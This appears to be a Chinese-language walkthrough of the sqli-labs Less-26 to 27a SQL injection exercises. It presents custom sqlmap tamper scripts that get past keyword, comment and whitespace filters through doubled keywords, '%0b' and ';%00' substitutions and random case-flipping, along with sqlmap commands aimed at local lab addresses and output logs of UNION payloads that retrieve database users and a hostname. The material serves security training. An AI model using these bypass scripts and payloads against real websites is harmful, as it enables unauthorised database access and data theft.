
SQLMAP脚本-sql-labs-Less-26-27a_a71脚本

a71脚本

testtest

sqli-labs (less-26 and less-26a)

dc5b8977ec274a1580225ab4037ed360.png

 观察后端代码

8b5c37606eb54090b2b62c634b49ed9c.png

发现空格、or、and 以及注释符 -- 和 # 都被过滤掉了
or、and 用双写绕过，注释符改用 ;%00
空格可用 %09、%0A、%0B、%0D、%20 等替代

编写sqlmap脚本命名为air.py

  1. #!/usr/bin/env python
  2. """
  3. Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
  4. See the file 'LICENSE' for copying permission
  5. """
  6. from lib.core.compat import xrange
  7. from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW  # sqlmap tamper priority (lib.core.enums.PRIORITY); presumably used to order chained tampers -- verify
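def tamper(payload, **kwargs):
    """
    Rewrite a payload for the sqli-labs Less-26 filter, which strips
    whitespace, 'or', 'and', '--' and '#' from the input.

    Transformation, in order:
      1. lower-case the payload (the keyword replacements below are
         case-sensitive)
      2. double the filtered keywords: 'or' -> 'oorr', 'and' -> 'anandd';
         every occurrence is doubled, e.g. 'information' ->
         'infoorrmation', and the filter removing one copy restores the
         original text
      3. replace the '#' comment marker with ';%00'
      4. replace every whitespace character with '%0b'

    Defender's note: a blocklist that *strips* tokens instead of rejecting
    the request is what makes this rewrite work, and the doubled keywords
    plus the '%0b' / '%00' control characters are an easy signature in
    request logs.

    :param payload: SQL payload handed over by sqlmap
    :param kwargs: unused; accepted to match the tamper calling convention
    :return: the rewritten payload; an empty/None payload is returned as is

    >>> tamper('1 AND 9227=9227')
    '1%0banandd%0b9227=9227'
    """
    if not payload:
        # nothing to rewrite; also avoids .lower() on None
        return payload

    rewritten = payload.lower()
    for keyword, doubled in (('or', 'oorr'), ('and', 'anandd')):
        rewritten = rewritten.replace(keyword, doubled)
    rewritten = rewritten.replace('#', ';%00')

    # '#' cannot occur any more at this point, so the former "copy the rest
    # from '#' onwards" branch was unreachable and has been dropped
    return "".join("%0b" if ch.isspace() else ch for ch in rewritten)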

test.py 用于打印 payload，以便更直观地观察 payload 的变化

  1. # sqlmap/tamper/escapequotes.py
  2. from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST  # sqlmap tamper priority (lib.core.enums.PRIORITY); presumably used to order chained tampers -- verify
def dependencies():
    """Tamper-module hook; this script has no dependencies to declare."""
def tamper(payload, **kwargs):
    """
    Debug tamper: print the payload it receives to stdout and return it
    unchanged.

    :param payload: SQL payload handed over by sqlmap
    :param kwargs: unused; accepted to match the tamper calling convention
    :return: ``payload``, untouched
    """
    del kwargs  # only present to satisfy the tamper signature
    print(payload)
    return payload

执行命令 ./sqlmap.py -u "http://192.168.227.128/Less-26/?id=3" --technique=U  --users --tamper=tamper/air.py,test.py
--technique 指定注入方式
--tamper 使用脚本
--users 显示用户名

  1. a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b84,1),null;%00
  2. [20:23:45] [INFO] retrieved: ''root'@'::1''
  3. -5593'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b85,1),null;%00
  4. [20:23:45] [INFO] retrieved: ''root'@'::1''
  5. -6736'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b86,1),null;%00
  6. [20:23:45] [INFO] retrieved: ''root'@'::1''
  7. -8374'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b87,1),null;%00
  8. [20:23:45] [INFO] retrieved: ''root'@'::1''
  9. -3304'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b88,1),null;%00
  10. [20:23:45] [INFO] retrieved: ''root'@'::1''
  11. -4517'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b89,1),null;%00
  12. [20:23:45] [INFO] retrieved: ''root'@'::1''
  13. -4869'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b90,1),null;%00
  14. [20:23:45] [INFO] retrieved: ''root'@'::1''
  15. -7274'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b91,1),null;%00
  16. [20:23:45] [INFO] retrieved: ''root'@'::1''
  17. -4829'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b92,1),null;%00
  18. [20:23:45] [INFO] retrieved: ''root'@'::1''
  19. -8704'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b93,1),null;%00
  20. [20:23:45] [INFO] retrieved: ''root'@'::1''
  21. -6012'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b94,1),null;%00
  22. [20:23:45] [INFO] retrieved: ''root'@'::1''
  23. -4253'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b95,1),null;%00
  24. [20:23:45] [INFO] retrieved: ''root'@'::1''
  25. -9915'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b96,1),null;%00
  26. [20:23:45] [INFO] retrieved: ''root'@'::1''
  27. -5771'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b97,1),null;%00
  28. [20:23:45] [INFO] retrieved: ''root'@'::1''
  29. -8983'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b98,1),null;%00
  30. [20:23:45] [INFO] retrieved: ''root'@'::1''
  31. -2093'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b99,1),null;%00
  32. [20:23:45] [INFO] retrieved: ''root'@'::1''
  33. -3862'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b100,1),null;%00
  34. [20:23:45] [INFO] retrieved: ''root'@'::1''
  35. -4369'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b101,1),null;%00
  36. [20:23:45] [INFO] retrieved: ''root'@'::1''
  37. -2212'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b102,1),null;%00
  38. [20:23:45] [INFO] retrieved: ''root'@'::1''
  39. -9541'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b103,1),null;%00
  40. [20:23:45] [INFO] retrieved: ''root'@'::1''
  41. -7175'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b104,1),null;%00
  42. [20:23:45] [INFO] retrieved: ''root'@'::1''
  43. -6760'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b105,1),null;%00
  44. [20:23:45] [INFO] retrieved: ''root'@'::1''
  45. -4589'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b106,1),null;%00
  46. [20:23:45] [INFO] retrieved: ''root'@'::1''
  47. -6738'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b107,1),null;%00
  48. [20:23:45] [INFO] retrieved: ''root'@'::1''
  49. -9742'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b108,1),null;%00
  50. [20:23:45] [INFO] retrieved: ''root'@'::1''
  51. -2312'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b109,1),null;%00
  52. [20:23:45] [INFO] retrieved: ''root'@'::1''
  53. -6153'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b110,1),null;%00
  54. [20:23:45] [INFO] retrieved: ''root'@'::1''
  55. -1282'%0bunion%0ball%0bselect%0bnull,(select%0bconcat(0x7170767071,ifnull(cast(grantee%0bas%0bnchar),0x20),0x7170717a71)%0bfrom%0binfoorrmation_schema.user_privileges%0blimit%0b111,1),null;%00
  56. [20:23:45] [INFO] retrieved: ''root'@'::1''
  57. database management system users [4]:
  58. [*] 'root'@'127.0.0.1'
  59. [*] 'root'@'2102cd85683f'
  60. [*] 'root'@'::1'
  61. [*] 'root'@'localhost'

可以看到 payload 已经按预期替换，注入也成功了

less-26a

./sqlmap.py -u "http://192.168.227.128/Less-26a/?id=3" --technique=B --hostname --users --tamper=tamper/air.py,test.py
同样的脚本使用报错注入即可

less-27

89af37f0ebc448109192b01b4c21dce7.png

观察后端代码
fe88d706f47a40c984d607995efe48d9.png

发现比起 less-26 多了对 select、union 大小写变体的过滤，但过滤是有规律的

修改 air.py 代码

  1. #!/usr/bin/env python
  2. """
  3. Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
  4. See the file 'LICENSE' for copying permission
  5. """
  6. import random
  7. from lib.core.compat import xrange
  8. from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW  # sqlmap tamper priority (lib.core.enums.PRIORITY); presumably used to order chained tampers -- verify
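def tamper(payload, **kwargs):
    """
    Rewrite a payload for the sqli-labs Less-27 filter, which on top of the
    Less-26 rules (whitespace, 'or', 'and', '--', '#' stripped) also strips
    certain case variants of 'select' and 'union'.

    Transformation, in order:
      1. lower-case the payload and double the filtered keywords
         ('or' -> 'oorr', 'and' -> 'anandd'); this runs *before* the case
         shuffle because str.replace is case-sensitive, and sqlmap emits
         its keywords in upper case
      2. replace the '#' comment marker with ';%00'
      3. flip the case of each ASCII letter with probability 1/2, so the
         keyword spelling is unlikely to match one of the filtered variants
      4. replace every whitespace character with '%0b'

    The output is randomised: compare ``result.lower()`` when testing.

    Defender's note: a filter that enumerates case variants is a blocklist
    with gaps; matching case-insensitively (or rejecting rather than
    stripping) closes this, and mixed-case keywords are a clear log signature.

    :param payload: SQL payload handed over by sqlmap
    :param kwargs: unused; accepted to match the tamper calling convention
    :return: the rewritten payload; an empty/None payload is returned as is
    """
    if not payload:
        return payload

    rewritten = payload.lower()
    for keyword, doubled in (('or', 'oorr'), ('and', 'anandd')):
        rewritten = rewritten.replace(keyword, doubled)
    rewritten = rewritten.replace('#', ';%00')

    # '#' cannot occur any more here, so no "copy the rest" branch is needed
    out = []
    for ch in rewritten:
        if ch.isspace():
            out.append("%0b")
        elif _is_ascii_letter(ch) and random.random() < 0.5:
            out.append(ch.swapcase())
        else:
            out.append(ch)
    return "".join(out)


def _is_ascii_letter(ch):
    """
    True only for 'a'-'z' / 'A'-'Z'.

    The earlier range test used ``(asciinum != 91,92,93,94,95,96)``, which
    is a tuple and therefore always true, so the six characters between 'Z'
    and 'a' (0x5B-0x60, '_' among them) were shifted by 32 and corrupted
    identifiers such as information_schema about half of the time.
    """
    return 'a' <= ch <= 'z' or 'A' <= ch <= 'Z'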

 ./sqlmap.py -u "http://192.168.0.101/sqli/Less-27?id=1" --technique=U --hostname --tamper=test.py,air.py

  1. /usr/lib/python3/dist-packages/pkg_resources/__init__.py:116: PkgResourcesDeprecationWarning: unknown is an invalid version and will not be supported in a future release
  2. warnings.warn(
  3. 3
  4. -4117'%0bUnioN%0ball%0bSelECt%0b54,concAt(0x71787A7871,(CaSE%0bWhEN%0b(DAtABAse()%0bliKe%0bSCHEmA())%0bTHEN%0b1%0belse%0b0%0bEnd),0x71706B7871),54;%00
  5. [20:18:10] [WARNING] reflective value(s) found and filtering out
  6. web application technology: PHP 5.6.9, Apache 2.4.39
  7. back-end DBMS: MySQL unknown
  8. [20:18:10] [INFO] fetching server hostname
  9. hostname: '20211114-104317'

成功爆出

less-27a

继续使用上个脚本即可
